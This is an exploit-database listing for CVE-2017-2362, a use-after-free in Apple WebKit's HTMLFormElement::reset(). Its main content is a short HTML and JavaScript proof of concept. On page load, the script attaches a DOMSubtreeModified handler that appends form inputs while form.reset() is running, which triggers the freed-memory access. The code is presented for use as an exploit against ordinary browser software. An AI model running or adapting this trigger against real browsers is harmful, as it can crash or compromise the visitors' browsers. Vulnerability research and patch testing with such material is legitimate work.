Sploitus

Exploit for Apple WebKit: HTMLFormElement::reset() use-after free(CVE-2017-2362)

seebug · 2017-03-31

Exploit Code

MARKDOWN25 lines
## https://sploitus.com/exploit?id=SSV:92866
<script>

function go() {

  output.value = "aaa";
  output.appendChild(inserted_div);

  document.getElementById("output").addEventListener('DOMSubtreeModified', function () {
    for(var i=0; i<20; i++) {
      form.appendChild(document.createElement("input"));
    }
  }, false);

  form.reset();

}

</script>
<body onload=go()>
<div id="inserted_div">foo</div>
<form id="form" onchange="eventhandler()">
<input type="text" value="foo">
<output id="output" oninput="eventhandler()"></output>
<input type="text" value="foo">